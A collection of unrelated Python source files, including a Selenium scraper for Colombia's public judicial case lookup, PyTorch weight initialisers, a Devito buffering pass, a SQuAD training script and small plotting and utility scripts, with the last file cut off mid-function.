"de error inexperada para la entidad: " + entity_name.strip()
)
return df
rblConsulta = wait_for_by_name(driver, "rblConsulta")
select_person = Select(rblConsulta)
select_person.select_by_index(1)
ddlTipoSujeto = wait_for_by_name(driver, "ddlTipoSujeto")
select_subject_type = Select(ddlTipoSujeto)
select_subject_type.select_by_index(2)
ddlTipoPersona = wait_for_by_name(driver, "ddlTipoPersona")
select_person_type = Select(ddlTipoPersona)
select_person_type.select_by_index(2)
txtNatural = wait_for_by_name(driver, "txtNatural")
txtNatural.clear()
txtNatural.send_keys(text2search)
# slider
sliderBehaviorConsultaNom_railElement = driver.find_element_by_id(
"sliderBehaviorConsultaNom_railElement"
)
move = ActionChains(driver)
move.click_and_hold(sliderBehaviorConsultaNom_railElement).move_by_offset(
10, 0
).release().perform()
btnConsultaNom = wait_for_by_name(driver, "btnConsultaNom")
btnConsultaNom.click()
try:
time.sleep(1)
        ## wait for the 'Cargando' (loading) overlay to change its style to display: none
xpath = "//div[@id='miVentana']"
wait_for_by_xpath(driver, xpath, timeout=30, wait_visibility=False)
except TimeoutException:
logger.info("No lo encuentro")
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para la entidad: " + entity_name.strip()
)
return df
    # wait for the results
btnGetCSV = wait_for_by_name(driver, "btnGetCSV")
btnGetCSV.click()
    # the results are offered for download via a link;
    # grab the link and download the file directly.
xpath_rsult = "//div[@id='updResultadosNum']/span[@id='lblCSVFileStatus']/b/a"
url_link = wait_for_by_xpath(driver, xpath_rsult).get_attribute("href")
url_link = url_link.replace("')", "")
url_link = url_link.replace("javascript:abrirDocumento('", "")
filename = url_link.split("/")[-1]
urllib.request.urlretrieve(url_link, filename=filename)
df = pd.read_csv(
filename, encoding="utf-16", sep=";", skiprows=[0], usecols=range(6)
)
df["Entidad"] = entity_name
logger.info(entity_name.strip() + ": OK")
return df
def scrap_city(driver, city_name, city_code, text2search):
logger.info("*****Obteniendo datos para: " + city_name.strip())
df = pd.DataFrame()
    # Select the city
ddlCiudad = wait_for_by_name(driver, "ddlCiudad")
select_city = Select(ddlCiudad)
select_city.select_by_value(city_code)
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para la ciudad: " + city_name.strip()
)
return df
    # Get the list of entities from the selector
entitys = get_options(driver, "ddlEntidadEspecialidad")
for entity in entitys:
try:
if not "(Inactivo)" in entity:
# Cuando la entidad no esta disponible, se añade "(Inactivo)"
# al nombre de la misma
df_temp = scrap_entity(driver, entity, entitys[entity], text2search)
df = pd.concat([df, df_temp], sort=True)
else:
continue
except Exception as e:
logger.error(
"=====>Error al obtener datos de la entidad: " + entity.strip()
)
logger.exception(e)
df["Ciudad"] = city_name
logger.info(city_name.strip() + ": OK*****")
return df
def scraping_by_text(text2search="sura", output_file=None):
"""Esta funcion permite buscar en la url ´´ENTRY_ENDPOINT´´
de la Rama judicial Colombiana los procesos de demanda encontra
de personas juridicas cuya razon coincida con ´´text2search´´ y
almacenar los resultados en un archivo de excel.
:param text2search: Parametros de busqueda, defaults to "sura"
:type text2search: str, optional
:param output_file: nombre del archivo de resultado, defaults to "result.xlsx"
:type output_file: str, optional
:return: resultados en cada entidad registrada en dicha pagina
:rtype: pd.DataFrame
"""
logger.info("Iniciando scraping")
df = pd.DataFrame()
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get(ENTRY_ENDPOINT)
if test_error(driver):
logger.debug("Se ha presentado una ventana de error inexperada")
return df
        # Get the list of cities from the selector
citys = get_options(driver, "ddlCiudad")
for city in citys:
try:
df_temp = scrap_city(driver, city, citys[city], text2search)
df = pd.concat([df, df_temp], sort=True)
except Exception as e:
logger.error(
"=====>Error al obtener datos de la ciudad: " + city.strip()
)
logger.exception(e)
except RequestException as e:
logger.error("Parece que algo esta mal con la conexion a internet")
except KeyboardInterrupt:
logger.warning("Programa detenido")
except Exception as e:
logger.error("Un error inexperado ha ocurrido")
logger.exception(e)
finally:
        try:
            driver.close()
        except Exception:
            pass
remove_temp_files()
        try:
            if output_file:
                df.to_excel(output_file)
except Exception as e:
logger.error("No se ha podido guardar el resultado")
logger.exception(e)
logger.info("Scraping terminado")
return df
def scraping_by_number(code="0508831030012015007900", output_file=None):
"""Esta funcion permite buscar en la url ´´ENTRY_ENDPOINT´´
de la Rama judicial Colombiana el proceso que tenga un numero de radicacion
que coincida con ´´code´´ y almacenar los resultados en un archivo de json.
:param code: Parametros de busqueda, defaults to "0508831030012015007900"
:type code: str, optional
:param output_file: nombre del archivo de resultado, defaults to "result.json"
:type output_file: str, optional
:return: informacion del proceso
:rtype: dict
"""
def _tranform_table(data, col):
columns = [
"fecha_actuacion",
"actuacion",
"anotacion",
"fecha_inicia_termino",
"fecha_finaliza_termino",
"fecha_registro",
]
result = [x.text for x in data]
result = [
dict(zip(columns, result[i : i + col])) for i in range(0, len(result), col)
]
return result
logger.info("Iniciando scraping")
resultado = {}
try:
driver = webdriver.Chrome(ChromeDriverManager().install())
driver.get(ENTRY_ENDPOINT)
if test_error(driver):
logger.debug("Se ha presentado una ventana de error inexperada")
ddlCiudad = wait_for_by_name(driver, "ddlCiudad")
select_city = Select(ddlCiudad)
logger.info(f"Buscando en: {code[:5]}")
select_city.select_by_value(code[:5])
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
ddlEntidadEspecialidad = wait_for_by_name(driver, "ddlEntidadEspecialidad")
select_entidad = Select(ddlEntidadEspecialidad)
entitys = get_options(driver, "ddlEntidadEspecialidad")
for entity in entitys:
if code[5:9] in entitys[entity]:
break
else:
raise Exception("Juzgado no encontrado")
select_entidad.select_by_value(entitys[entity])
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
xpath_txt = "//div[@id='divNumRadicacion']/table/tbody/tr/td/div/input"
txtNumRadicacion = wait_for_by_xpath(driver, xpath_txt)
txtNumRadicacion.clear()
txtNumRadicacion.send_keys(code)
        # note: this is the NumeroProceso slider, unlike the ConsultaNom one above
        slider_rail = driver.find_element_by_id(
            "sliderBehaviorNumeroProceso_railElement"
        )
        move = ActionChains(driver)
        move.click_and_hold(slider_rail).move_by_offset(
            10, 0
        ).release().perform()
btnConsulta = wait_for_by_xpath(
driver,
"//div[@id='divNumRadicacion']/table/tbody/tr/td/input[@value='Consultar']",
)
btnConsulta.click()
if test_error(driver):
logger.debug(
"Se ha presentado una ventana "
"de error inexperada para el numero de radicado: " + code
)
resultado = {"numeroRadicacion": code, "datos": {}, "actuaciones": []}
contenedor = wait_for_by_xpath(
driver, "//div[@id='divActuaciones']/div[@class='contenedor']"
)
resultado["datos"]["despacho"] = wait_for_by_xpath(
contenedor, "//span[@id='lblJuzgadoActual']"
).text
resultado["datos"]["ponente"] = wait_for_by_xpath(
contenedor, "//span[@id='lblPonente']"
).text
resultado["datos"]["tipo"] = wait_for_by_xpath(
contenedor, "//span[@id='lblTipo']"
).text
resultado["datos"]["clase"] = wait_for_by_xpath(
contenedor, "//span[@id='lblClase']"
).text
resultado["datos"]["recurso"] = wait_for_by_xpath(
contenedor, "//span[@id='lblRecurso']"
).text
resultado["datos"]["ubicacion"] = wait_for_by_xpath(
contenedor, "//span[@id='lblUbicacion']"
).text
resultado["datos"]["demandantes"] = wait_for_by_xpath(
contenedor, "//span[@id='lblNomDemandante']"
).text.split("-")[1:]
resultado["datos"]["demandantes"] = [x.strip() for x in resultado["datos"]["demandantes"]]
resultado["datos"]["demandados"] = wait_for_by_xpath(
contenedor, "//span[@id='lblNomDemandado']"
).text.split("-")[1:]
resultado["datos"]["demandados"] = [x.strip() for x in resultado["datos"]["demandados"]]
resultado["datos"]["contenido"] = wait_for_by_xpath(
contenedor, "//span[@id='lblContenido']"
).text
resultado["actuaciones"] = contenedor.find_elements(
By.XPATH,
"//table[@class='ActuacionesDetalle']/tbody/tr[@class='tr_contenido']/td",
)
resultado["actuaciones"] = _tranform_table(resultado["actuaciones"], 6)
except RequestException as e:
logger.error("Parece que algo esta mal con la conexion a internet")
except KeyboardInterrupt:
logger.warning("Programa detenido")
except Exception as e:
logger.error("Un error inexperado ha ocurrido")
logger.exception(e)
finally:
        try:
            driver.close()
        except Exception:
            pass
try:
if output_file:
with open(output_file, "w") as f:
json.dump(resultado, f)
except Exception as e:
logger.error("No se ha podido guardar el resultado")
logger.exception(e)
logger.info("Scraping terminado")
return resultado
@click.command()
@click.option(
"--text2search",
prompt="Ingrese el texto a durante la busqueda",
help="Texto a buscar",
)
@click.option("--output_file", default="output")
@click.option('--code/--no-code', default=False)
def scraping_wraper(text2search, output_file, code):
if not code:
output_file += ".xlsx"
return scraping_by_text(text2search, output_file)
else:
output_file += ".json"
return scraping_by_number(text2search, output_file)
if __name__ == "__main__":
scraping_wraper() # pylint: disable=E1120
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author zengxiaohui
# Datetime: 6/22/2021 12:51 PM
# @File: init_weight
import math
import torch
from torch import nn
def _init_weight(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
#---------------------------------------#
def initialize_weights(*models):
for model in models:
real_init_weights(model)
def real_init_weights(m):
if isinstance(m, list):
for mini_m in m:
real_init_weights(mini_m)
else:
if isinstance(m, torch.nn.Conv2d):
torch.nn.init.kaiming_normal_(m.weight, nonlinearity='relu')
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Linear):
m.weight.data.normal_(0.0, std=0.01)
elif isinstance(m, torch.nn.BatchNorm2d):
torch.nn.init.constant_(m.weight, 1)
torch.nn.init.constant_(m.bias, 0)
elif isinstance(m, torch.nn.Module):
for mini_m in m.children():
real_init_weights(mini_m)
else:
            print('unknown module', m)
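# A minimal usage sketch: apply the recursive initializer to a small module tree.
if __name__ == '__main__':
    net = nn.Sequential(nn.Conv2d(3, 8, 3), nn.BatchNorm2d(8))
    initialize_weights(net)
    print(net[1].weight)  # BatchNorm2d weights are now all ones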
|
#!/usr/bin/env python3
import re
import sys
# Parses a common style of defining enums in c, printing each with their hex value.
# With small modifications, this could be used to generate a function to convert status codes to strings.
#
# To parse the statuses in this repo
# cat src/include/com/amazonaws/kinesis/video/webrtcclient/Include.h | ./scripts/parse_status.py
'''
# Example usage (uncomment as a basic test)
paragraph="""
#define STATUS_PARENT 0x4
#define STATUS_CHILD STATUS_PARENT + 0x1
"""
operands_map = operands_by_name(paragraph)
print(operands_map) # {'STATUS_CHILD': ('STATUS_PARENT', 1), 'STATUS_PARENT': (None, 4)}
example_sums = hex_sums(operands_map)
print(example_sums) # {'STATUS_CHILD': "0x5", 'STATUS_PARENT': "0x4"}
'''
pattern = re.compile(r"#define *([A-Z_]*) *(([A-Z_]*) *\+ *)?0x([0-9]*)")
def operands_by_name(paragraph):
matches = filter(None, [pattern.match(line) for line in paragraph.splitlines()])
return {groups[0]: (groups[2], int(groups[3], base=16)) for groups in
[match.groups() for match in matches]}
def sum_value(by_name, name):
base, idx = by_name[name]
return idx if base is None else idx + sum_value(by_name, base)
def hex_sums(by_name):
    # use the argument rather than the module-level operands_map so the
    # function also works standalone (as in the docstring example)
    return {name: hex(sum_value(by_name, name)) for name in by_name.keys()}
paragraph = sys.stdin.read()
operands_map = operands_by_name(paragraph)
sums_map = hex_sums(operands_map)
longest_status = len(max(sums_map.keys(), key=len))
lines = ["{:{}s} {}".format(name, longest_status, value) for name, value in sums_map.items()]
print("\n".join(lines))
|
# -*-coding:utf-8-*-
import turtle
if __name__ == "__main__":
turtle.pensize(5)
turtle.speed(10)
turtle.fillcolor("red")
turtle.begin_fill()
turtle.circle(10,180)
turtle.circle(25,110)
turtle.left(50)
turtle.circle(60,45)
turtle.circle(20,170)
turtle.right(24)
turtle.fd(30)
turtle.left(10)
turtle.circle(30,110)
turtle.fd(20)
turtle.left(40)
turtle.circle(90,70)
turtle.circle(30,150)
turtle.right(30)
turtle.fd(15)
turtle.circle(80,90)
turtle.left(15)
turtle.fd(45)
turtle.right(165)
turtle.fd(20)
turtle.left(155)
turtle.circle(150,80)
turtle.left(50)
turtle.circle(150,90)
turtle.end_fill()
turtle.left(150)
turtle.circle(-90,70)
turtle.left(20)
turtle.circle(75,105)
turtle.setheading(60)
turtle.circle(80,98)
turtle.circle(-90,40)
turtle.left(180)
turtle.circle(90,40)
turtle.circle(-80,98)
turtle.setheading(-83)
input("press<Enter>")
|
import os, pickle
from .main import build_url, pandize, url_storage_function
mydir = os.path.dirname(os.path.abspath(__file__))  # assumed: not defined in the original snippet
wug_urls_book = pickle.load(open(os.path.join(mydir, 'cities_urls'), 'rb'))
|
import matplotlib
# matplotlib.use('Qt5Agg')
from matplotlib import pyplot as plt
from matplotlib.dates import date2num, DateFormatter
import pandas as pd
import datetime as dt
# load data
file_loc = r'C:\Users\Ayush Jain\Documents\MSL\1255 - Assemblie 2 (MARSIM-2)\Data\1255-GLUEDASSEMBLIES-P3.xlsx'
df = pd.read_excel(file_loc, usecols=[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17])
row_skip = 6
raw_date = df.iloc[row_skip:, 0]
raw_time = df.iloc[row_skip:, 1]
datetime = []
# print (raw_date, raw_time)
for m, n in zip(raw_date, raw_time):
value = dt.datetime.combine(m.date(), n)
datetime.append(date2num(value))
#loading data into lists
data_col1 = df.iloc[row_skip:, 2]
data_col2 = df.iloc[row_skip:, 3]
data_col3 = df.iloc[row_skip:, 4]
data_col4 = df.iloc[row_skip:, 5]
data_col5 = df.iloc[row_skip:, 6]
data_col6 = df.iloc[row_skip:, 7]
data_col7 = df.iloc[row_skip:, 8]
data_col8 = df.iloc[row_skip:, 9]
data_col9 = df.iloc[row_skip:, 10]
data_col10 = df.iloc[row_skip:, 11]
data_col11 = df.iloc[row_skip:, 12]
data_col12 = df.iloc[row_skip:, 13]
data_col13 = df.iloc[row_skip:, 14]
data_col14 = df.iloc[row_skip:, 15]
data_col15 = df.iloc[row_skip:, 16]
data_col16 = df.iloc[row_skip:, 17]
#plotting
fig = plt.figure()
ax1 = fig.add_subplot(111)
ax1.plot(datetime, data_col1, label='SA1')
ax1.plot(datetime, data_col2, label='SA2')
ax1.plot(datetime, data_col3, label='SA5')
ax1.plot(datetime, data_col4, label='SB1')
ax1.plot(datetime, data_col5, label='SB3')
ax1.plot(datetime, data_col6, label='SB5')
ax1.plot(datetime, data_col15, label='AVG (TRP)')
ax1.plot(datetime, data_col16, label='TCR')
ax1.plot(datetime, data_col7, label='CP Rear')
ax1.plot(datetime, data_col8, label='CP Front')
# ax1.plot(datetime, data_col9, label='Pressure (V)')
# ax1.plot(datetime, data_col10, label='Pressure (mbar)')
# #limits
ax1.plot(datetime, data_col11, color='red')
ax1.plot(datetime, data_col12, color='red')
ax1.plot(datetime, data_col13, color='red')
ax1.plot(datetime, data_col14, color='red')
#ticks formatting for datetime
ticksSkip = max(1, len(datetime)//200)  # guard against a zero step for short series
ticksUsed = datetime[::ticksSkip]
ax1.set_xticks(ticksUsed)
ax1.set_xticklabels(ticksUsed)
fig.autofmt_xdate()
ax1.xaxis.set_major_formatter(DateFormatter('%m/%d %H:%M'))
ax1.set_title('PROBA-3 Glued Assemblies( MARSIM-2 ) \n Mechanical System Laboratory')
ax1.set_xlabel('date/time')
ax1.set_ylabel('Temperature Change Rate (°C/min)')
# ax1.set_ylim([-1.5, 1.5])
ax1.grid()
ax1.legend()
plt.show()
|
print("Hello Alejandro! I was first")
|
from collections import OrderedDict
from itertools import combinations
from cached_property import cached_property
from devito.exceptions import InvalidOperator
from devito.logger import warning
from devito.symbolics import retrieve_function_carriers, uxreplace
from devito.tools import (Bunch, DefaultOrderedDict, as_tuple, filter_ordered, flatten,
timed_pass)
from devito.types import Array, CustomDimension, Dimension, Eq, SteppingDimension
__all__ = ['buffering']
@timed_pass()
def buffering(expressions, callback=None, options=None):
"""
Replace written Functions with Arrays. This gives the compiler more control
over storage layout, data movement (e.g. between host and device), etc.
Parameters
----------
expressions : list of expr-like
The expressions to which the pass is applied.
callback : callable, optional
A mechanism to express what the buffering candidates are, and what
Dimensions, if any, should be replaced by SteppingDimensions, such that
the buffer has a smaller footprint than that of the Function it stems
from. The callable takes a Function as input and returns either None
or a list. If the output is None, then the input is not a buffering
candidate. Otherwise, the output is a buffering candidate and the list
contains the Dimensions to be replaced by new SteppingDimensions. If
unspecified, by default all DiscreteFunctions are turned into buffers,
but no Dimension replacement occurs.
options : dict, optional
The optimization options.
Accepted: ['buf-async-degree'].
* 'buf-async-degree': Specify the size of the buffer. By default, the
buffer size is the minimal one, inferred from the memory accesses in
the ``expressions`` themselves. An asynchronous degree equals to `k`
means that the buffer will be enforced to size=`k` along the introduced
SteppingDimensions. This might help relieving the synchronization
overhead when asynchronous operations are used (these are however
implemented by other passes).
Examples
--------
    Assume the callback returns `[time]` for every Function defined over
    `time`, meaning that such Functions should be replaced by buffers using a
    SteppingDimension in place of `time` in the same slot.
    Consider the Eq below:
        Eq(u[time+1, x], u[time, x] + u[time-1, x] + 1)
    We see that `u(time, x)` is both read and written, so it is a buffering
    candidate; the callback selects `time` for contraction, and buffering
    boils down to:
1. Introducing two Eqs to initialize the buffer `ub`, i.e.
Eq(ub[d, x], u[d, x])
Eq(ub[d-1, x], u[d-1, x])
2. Introduce one Eq to copy `ub` back into `u`
Eq(u[time+1, x], ub[d+1, x])
3. Replace all other occurrences of `u` with `ub`
So eventually we have four Eqs:
Eq(ub[d, x], u[d, x]),
Eq(ub[d-1, x], u[d-1, x])
Eq(ub[d+1, x], ub[d, x] + ub[d-1, x] + 1)
Eq(u[time+1, x], ub[d+1, x])
"""
if callback is None:
def callback(f):
if f.is_DiscreteFunction:
return []
else:
return None
assert callable(callback)
return _buffering(expressions, callback, options)
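# A minimal callback sketch (an illustration, not a built-in default): contract
# the time dimension of any TimeFunction into a stepping buffer and leave all
# other Functions untouched.
#
#     def time_callback(f):
#         if f.is_TimeFunction:
#             return [f.time_dim]
#         return None
#
#     processed = buffering(expressions, callback=time_callback,
#                           options={'buf-async-degree': None})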
def _buffering(expressions, callback, options):
async_degree = options['buf-async-degree']
# Locate all Function accesses within the provided `expressions`
accessmap = AccessMapper(expressions)
# Create the buffers
buffers = []
for n, (f, accessv) in enumerate(accessmap.items()):
dims = callback(f)
if dims is None:
# Not a buffer candidate
continue
if accessv.lastwrite is None:
# Read-only Functions cannot be buffering candidates
continue
buffers.append(Buffer(f, dims, accessv, n, async_degree))
# Create Eqs to initialize buffers. Note: a buffer needs to be initialized
# only if the buffered Function is read in at least one place or in the case
# of non-uniform SubDimensions, to avoid uninitialized values to be copied-back
# into the buffered Function
processed = [Eq(b.indexify(), b.function.subs(b.contraction_mapper))
for b in buffers if b.is_read or not b.has_uniform_subdims]
# Substitution rules to replace buffered Functions with buffers
subs = {}
for b in buffers:
for a in b.accessv.accesses:
subs[a] = b.indexify(a.indices)
# Create Eqs to copy back buffers into their buffered Functions
for e in expressions:
processed.append(uxreplace(e, subs))
# We also append the copy-back if `e` is the last-write of some buffers
for b in buffers:
if e is b.accessv.lastwrite:
items = list(zip(e.lhs.indices, b.function.dimensions))
lhs = b.function[[i if i in b.index_mapper else d for i, d in items]]
rhs = b.indexed[[b.index_mapper.get(i, d) for i, d in items]]
if b.subdims_mapper:
processed.append(uxreplace(Eq(lhs, rhs), b.subdims_mapper))
else:
processed.append(Eq(lhs, rhs))
break
return processed
class Buffer(object):
"""
A buffer with metadata attached.
Parameters
----------
function : DiscreteFunction
The object for which a buffer is created.
contracted_dims : list of Dimension
The Dimensions in `function` to be contracted, that is to be replaced
by SteppingDimensions.
accessv : AccessValue
All accesses involving `function`.
n : int
A unique identifier for this Buffer.
async_degree : int, optional
Enforce a size of `async_degree` along the contracted Dimensions.
"""
def __init__(self, function, contracted_dims, accessv, n, async_degree):
self.function = function
self.accessv = accessv
contraction_mapper = {}
index_mapper = {}
dims = list(function.dimensions)
for d in contracted_dims:
assert d in function.dimensions
# Determine the buffer size along `d`
indices = filter_ordered(i.indices[d] for i in accessv.accesses)
slots = [i.xreplace({d: 0, d.spacing: 1}) for i in indices]
size = max(slots) - min(slots) + 1
if async_degree is not None:
if async_degree < size:
warning("Ignoring provided asynchronous degree as it'd be "
"too small for the required buffer (provided %d, "
"but need at least %d for `%s`)"
% (async_degree, size, function.name))
else:
size = async_degree
# Replace `d` with a suitable CustomDimension
bd = CustomDimension('db%d' % n, 0, size-1, size, d)
contraction_mapper[d] = dims[dims.index(d)] = bd
if size > 1:
# Create the necessary SteppingDimensions for indexing
sd = SteppingDimension(name='sb%d' % n, parent=bd)
index_mapper.update({i: i.xreplace({d: sd}) for i in indices})
else:
# Special case, no need to keep a SteppingDimension around
index_mapper.update({i: 0 for i in indices})
self.contraction_mapper = contraction_mapper
self.index_mapper = index_mapper
# Track the SubDimensions used to index into `function`
subdims_mapper = DefaultOrderedDict(set)
for e in accessv.mapper:
try:
# Case 1: implicitly via SubDomains
m = {d.root: v for d, v in e.subdomain.dimension_map.items()}
except AttributeError:
# Case 2: explicitly via the lower-level SubDimension API
m = {i.root: i for i in e.free_symbols
if isinstance(i, Dimension) and (i.is_Sub or not i.is_Derived)}
for d, v in m.items():
subdims_mapper[d].add(v)
if any(len(v) > 1 for v in subdims_mapper.values()):
# Non-uniform SubDimensions. At this point we're going to raise
# an exception. It's either illegal or still unsupported
for v in subdims_mapper.values():
for d0, d1 in combinations(v, 2):
if d0.overlap(d1):
raise InvalidOperator("Cannot apply `buffering` to `%s` as it "
"is accessed over the overlapping "
" SubDimensions `<%s, %s>`" %
(function, d0, d1))
self.subdims_mapper = None
raise NotImplementedError("`buffering` does not support multiple "
"non-overlapping SubDimensions yet.")
else:
self.subdims_mapper = {d: v.pop() for d, v in subdims_mapper.items()}
self.buffer = Array(name='%sb' % function.name,
dimensions=dims,
dtype=function.dtype,
halo=function.halo,
space='mapped')
def __repr__(self):
return "Buffer[%s,<%s:%s>]" % (self.buffer.name,
','.join(str(i) for i in self.contraction_mapper),
','.join(str(i).replace(" ", "")
for i in self.index_mapper))
@property
def is_read(self):
return self.accessv.is_read
@property
def lastwrite(self):
return self.accessv.lastwrite
@property
def has_uniform_subdims(self):
return self.subdims_mapper is not None
@cached_property
def indexed(self):
return self.buffer.indexed
def indexify(self, indices=None):
if indices is None:
indices = list(self.buffer.dimensions)
else:
indices = [self.index_mapper.get(i, i) for i in indices]
return self.indexed[indices]
class AccessValue(object):
"""
A simple data structure tracking the accesses performed by a given Function
in a sequence of expressions.
Parameters
----------
function : Function
The target Function.
mapper : dict
A mapper from expressions to Indexeds, representing all accesses to
`function` in a sequence of expressions.
"""
def __init__(self, function, mapper):
self.function = function
self.mapper = mapper
@cached_property
def exprs(self):
return tuple(self.mapper)
@cached_property
def accesses(self):
return tuple(flatten(as_tuple(i.reads) + as_tuple(i.write)
for i in self.mapper.values()))
@cached_property
def is_read(self):
return any(av.reads for av in self.mapper.values())
@cached_property
def lastwrite(self):
for e, av in reversed(self.mapper.items()):
if av.write is not None:
return e
return None
AccessTuple = lambda: Bunch(reads=[], write=None)
class AccessMapper(OrderedDict):
def __init__(self, expressions):
mapper = DefaultOrderedDict(lambda: DefaultOrderedDict(AccessTuple))
for e in expressions:
for i in retrieve_function_carriers(e.rhs):
mapper[i.function][e].reads.append(i)
mapper[e.lhs.function][e].write = e.lhs
super().__init__([(f, AccessValue(f, mapper[f])) for f in mapper])
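# Illustrative sketch (assumes Devito-style expressions with .lhs/.rhs): for
# eq: u[t+1] = u[t] + 1, AccessMapper([eq]) maps u to an AccessValue whose
# mapper is {eq: Bunch(reads=[u[t]], write=u[t+1])}.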
|
import torch.nn as nn
import torch.optim as optim
import argparse
from Data.utils import read_data,get_structure,get_index,get_question_set,get_word_embeddings,get_prediction,get_f1,get_exact_match
from Data.dataloader import DataLoader
from Model.model import Model
def train(model,dataloader,lossFunction,optimizer,epochs,iterations,dataloader_validation,valid_iters):
for epoch in range(epochs):
model.train()
optimizer.zero_grad()
loss=0
for _ in range(iterations):
context_sentence,context_char,question_sentence,question_char,start,end=dataloader.get_next()
start_logits,end_logits=model(context_sentence,question_sentence,question_char,context_char)
loss+=lossFunction(start_logits,start)
loss+=lossFunction(end_logits,end)
final_loss=loss.item()
loss.backward()
optimizer.step()
f1,em,valid_loss=validate(model,dataloader_validation,valid_iters,lossFunction)
print('epoch=',epoch+1,'training loss=',final_loss/iterations,'validation loss=',valid_loss,'F1 score=',f1,'Exact Match score=',em)
def validate(model,dataloader,iterations,lossFunction):
model.eval()
loss=0
em=0
f1=0
for _ in range(iterations):
context_sentence,context_char,question_sentence,question_char,start,end=dataloader.get_next()
start_logits,end_logits=model(context_sentence,question_sentence,question_char,context_char)
loss+=lossFunction(start_logits,start)
loss+=lossFunction(end_logits,end)
pred=get_prediction(start_logits,end_logits)
gold=[int(start[0]),int(end[0])]
f1+=get_f1(gold,pred)
em+=get_exact_match(gold,pred)
return f1/iterations,em/iterations,loss.item()/iterations
def main(args):
path=args.train_path
path_valid=args.dev_path
data=read_data(path)
data_valid=read_data(path_valid)
hidden_size=args.hidden_size
char_size=args.convolutions
embedding_size=args.embedding_size
char_embed_size=args.char_embedding_size
dropout=args.dropout
kernel_size=args.kernel_size1
    modeling_type=args.modeling_type
output,char_set=get_structure(data)
output_valid,char_set_valid=get_structure(data_valid)
for char in char_set_valid:
char_set.add(char)
char_output,char_to_int,int_to_char,n_char=get_index(output,char_set)
question_set=get_question_set(output)
    char_output_valid,_,_,_=get_index(output_valid,char_set)
question_set_valid=get_question_set(output_valid)
word_dict_question=get_word_embeddings(question_set,embedding_size)
word_dict_context=get_word_embeddings(output['contexts'],embedding_size)
word_dict_question_valid=get_word_embeddings(question_set_valid,embedding_size)
word_dict_context_valid=get_word_embeddings(output_valid['contexts'],embedding_size)
dataLoader=DataLoader(output,char_output,word_dict_context,word_dict_question)
dataLoader_valid=DataLoader(output_valid,char_output_valid,word_dict_context_valid,word_dict_question_valid)
    model=Model(embedding_size,char_size,hidden_size,kernel_size,n_char,modeling_type,char_embed_size,dropout).cuda()
epochs=args.epochs
iterations=len(question_set)
iterations_validation=len(question_set_valid)
lossFunction=nn.CrossEntropyLoss()
optimizer=optim.Adadelta(model.parameters(),lr=args.learning_rate)
train(model,dataLoader,lossFunction,optimizer,epochs,iterations,dataLoader_valid,iterations_validation)
def setup():
parser=argparse.ArgumentParser('options for file')
    parser.add_argument('--dev_path',type=str,default='/home/pranav/ml/data/SQuAD 1.1/dev-v1.1.json',help='enter development file path')
parser.add_argument('--train_path',type=str,default='/home/pranav/ml/data/SQuAD 1.1/train-v1.1.json',help='enter training file path')
parser.add_argument('--learning_rate',type=float,default=0.5,help='learning rate')
parser.add_argument('--epochs',type=int,default=12)
parser.add_argument('--modeling_type',type=str,default='concat',help='enter type for modeling')
parser.add_argument('--hidden_size',type=int,default=100,help="hidden sizes for LSTM's")
parser.add_argument('--convolutions',type=int,default=100,help='output channels for Conv1D')
parser.add_argument('--embedding_size',type=int,default=100,help='embedding size for Word2Vec')
parser.add_argument('--kernel_size1',type=int,default=5,help='first kernel size')
parser.add_argument('--dropout',type=float,default=0.2)
parser.add_argument('--char_embedding_size',type=int,default=8)
args=parser.parse_args()
return args
if __name__=='__main__':
args=setup()
main(args)
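# Example invocation (paths are illustrative):
#   python train.py --train_path train-v1.1.json --dev_path dev-v1.1.json --epochs 12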
|
__version__ = "0.1.0"
from .grids import get_distances, get_metrics, get_coords, get_grid
from .utils import *
from . import pnplot
from . import utils
|
from knigavuhe import Client
cl = Client()
r = cl.search_books('Агата Кристи')
print(r)
print(r[0])
|
#!/usr/bin/env python
"""
Tool for combining and converting paths within catalog files
"""
import sys
import json
import argparse
from glob import glob
from pathlib import Path
def fail(message):
print(message)
sys.exit(1)
def build_catalog():
catalog_paths = []
for source_glob in CLI_ARGS.sources:
catalog_paths.extend(glob(source_glob))
items = []
for catalog_original_path in catalog_paths:
catalog_path = Path(catalog_original_path).absolute()
print('Loading catalog "{}"'.format(str(catalog_original_path)))
if not catalog_path.is_file():
fail('Unable to find catalog file "{}"'.format(str(catalog_path)))
with open(catalog_path, 'r', encoding='utf-8') as catalog_file:
catalog_items = json.load(catalog_file)
base_path = catalog_path.parent.absolute()
for item in catalog_items:
new_item = {}
for entry, entry_original_path in item.items():
entry_path = Path(entry_original_path)
entry_path = entry_path if entry_path.is_absolute() else (base_path / entry_path).absolute()
if ((len(CLI_ARGS.check) == 1 and CLI_ARGS.check[0] == 'all')
or entry in CLI_ARGS.check) and not entry_path.is_file():
note = 'Catalog "{}" - Missing file for "{}" ("{}")'.format(
str(catalog_original_path), entry, str(entry_original_path))
if CLI_ARGS.on_miss == 'fail':
fail(note + ' - aborting')
if CLI_ARGS.on_miss == 'ignore':
print(note + ' - keeping it as it is')
new_item[entry] = str(entry_path)
elif CLI_ARGS.on_miss == 'drop':
print(note + ' - dropping catalog item')
new_item = None
break
else:
print(note + ' - removing entry from item')
else:
new_item[entry] = str(entry_path)
if CLI_ARGS.output is not None and new_item is not None and len(new_item.keys()) > 0:
items.append(new_item)
if CLI_ARGS.output is not None:
catalog_path = Path(CLI_ARGS.output).absolute()
print('Writing catalog "{}"'.format(str(CLI_ARGS.output)))
if CLI_ARGS.make_relative:
base_path = catalog_path.parent
for item in items:
for entry in item.keys():
item[entry] = str(Path(item[entry]).relative_to(base_path))
if CLI_ARGS.order_by is not None:
items.sort(key=lambda i: i[CLI_ARGS.order_by] if CLI_ARGS.order_by in i else '')
with open(catalog_path, 'w', encoding='utf-8') as catalog_file:
